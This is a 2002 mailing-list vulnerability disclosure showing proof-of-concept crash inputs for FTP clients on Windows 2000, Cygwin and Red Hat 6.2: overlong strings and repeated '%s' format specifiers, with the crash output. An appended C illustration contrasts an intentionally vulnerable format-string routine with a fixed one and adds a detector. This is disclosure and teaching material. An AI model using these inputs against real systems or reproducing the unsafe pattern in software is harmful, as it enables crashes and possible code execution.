From: lion (lioncnhonker.net)
Date: Sun May 05 2002 - 13:33:17 CDT


    [vuln-dev] Multiple Local Vulnerabilities in some FTP Clients.

    1. Windows 2000 (and other versions) FTP client overflows and format string vulnerability.
    a.
    d:\>perl -e "printf 'A'x3000"|ftp
    Invalid command.
    ftp>

    You will see the "memory at 0x4141414d could not be read" error.

    d:\>perl -e "printf 'open '. 'A'x3000"|ftp
    Already connected to (null), use disconnect first.

    You will see the "memory at 0x4141414d could not be read" error.

    b.
    d:\>ftp localhost
    Connected to lion.
    220 lion Microsoft FTP Service (Version 5.0).
    User (lion:(none)): ftp
    331 Anonymous access allowed, send identity (e-mail name) as password.
    Password:
    230 Anonymous user logged in.
    ftp> debug
    Debugging On .
    ftp> cd AAAAAAAAAA... ('A' x 500)
    500 Command was too long
    421 Terminating connection.
    Connection closed by remote host.
    ftp> debug
    Debugging On .
    ftp> open localhost
    Connected to lion.
    220 lion Microsoft FTP Service (Version 5.0).
    User (lion:(none)): ftp
    ---> USER ftp
    331 Anonymous access allowed, send identity (e-mail name) as password.
    Password:
    ---> PASS f
    230 Anonymous user logged in.
    ftp> cd AAAAAAAAAAAAAAAA... ('A' x 2000)

    You will see the "memory at 0x41414141 could not be read" error.

    ftp> ls AAAAAAAAAAAAAAAA... ('A' x 2000)
    ---> PORT 127,0,0,1,4,114
    200 PORT command successful.
    ---> NLST AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...

    You will see the "memory at 0x41414141 could not be read" error.

    c.
    d:\>ftp localhost
    Connected to lion.
    220 lion Microsoft FTP Service (Version 5.0).
    User (lion:(none)): ftp
    331 Anonymous access allowed, send identity (e-mail name) as password.
    Password:
    230 Anonymous user logged in.
    ftp> debug
    Debugging On .
    ftp> quote %s
    ---> quote %s
    500 'QUOTE %s': command not understood
    ftp> quote %s%s%s
    ---> quote %s%s%s?(null)
    500 'QUOTE %s%s%s (null)': command not understood
    ftp> quote %s%s%s%s%s%s%s%s
    --->

    You will see the "memory at 0x73257325 could not be read" error.

    Disassembling ftp.exe with W32Dasm, we can find:
    780127A8 mov dword ptr [eax],ecx

    This is characteristic of the Win2000 format string vulnerability.

    2. Cygwin version 2.194.2.21 and Red Hat 6.2 FTP client format string vulnerability.

    lionLION ~
    $ ftp localhost
    Connected to lion.
    220 lion Microsoft FTP Service (Version 5.0).
    Name (localhost:lion): ftp
    331 Anonymous access allowed, send identity (e-mail name) as password.
    Password:
    230 Anonymous user logged in.
    Remote system type is Windows_NT.
    ftp> debug
    Debugging on (debug=1).
    ftp> quote %s
    ---> %s
    500 '%S': command not understood
    ftp> quote %s%s%s%s%s%s%s
    Segmentation fault (core dumped)

    Can anyone exploit it remotely?
    Sorry for my poor English. :)

    Lion
    lioncnhonker.net
    HUC
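The crashes above ("quote %s%s%s" reading 0x73257325, i.e. "%s%s" as an address) are the classic symptom of user data reaching a printf-family function as its format argument. The following is an added illustration, not code from the post or from any of the FTP clients named in it: a hypothetical debug-echo routine in the vulnerable form beside the hardened form, plus a helper that counts conversion directives in a string, which is the check a reviewer or fuzzer would apply to any string that is about to be used as a format.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical logging wrapper, as many clients have: forwards its
 * arguments to vsnprintf. Because it takes a variable argument list,
 * the compiler cannot see whether 'fmt' is trusted. */
int render(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int r = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return r;
}

/* Vulnerable pattern: the user-typed command IS the format string, so
 * every "%s" in it dereferences whatever sits in the next argument slot
 * (undefined behaviour; on the page it shows up as a read at 0x73257325). */
int echo_unsafe(char *out, size_t n, const char *cmd)
{
    return render(out, n, cmd);            /* BUG: untrusted format string */
}

/* Hardened pattern: a constant format, the user data passed as data.
 * "%s%s%s" now comes out as the literal bytes, exactly as "---> " + cmd. */
int echo_safe(char *out, size_t n, const char *cmd)
{
    return render(out, n, "---> %s", cmd);
}

/* Count printf conversion directives, treating "%%" as a literal percent
 * and a trailing lone '%' as nothing. Any non-zero result for a string that
 * reaches a printf-family call as its format argument is this bug class. */
int count_conversions(const char *s)
{
    int n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }  /* escaped percent sign */
        if (p[1] == '\0') break;             /* incomplete directive */
        n++;
    }
    return n;
}

int main(void)
{
    const char *probe = "%s%s%s%s%s%s%s";    /* constructed, mirrors the post */
    char line[64];
    echo_safe(line, sizeof line, probe);
    printf("%s  (directives in input: %d)\n", line, count_conversions(probe));
    return 0;
}
```

Compiling with -Wformat -Wformat-security does not flag echo_unsafe because render() carries no format attribute; adding `__attribute__((format(printf, 3, 4)))` to render() in GCC/Clang is what makes the compiler catch this pattern.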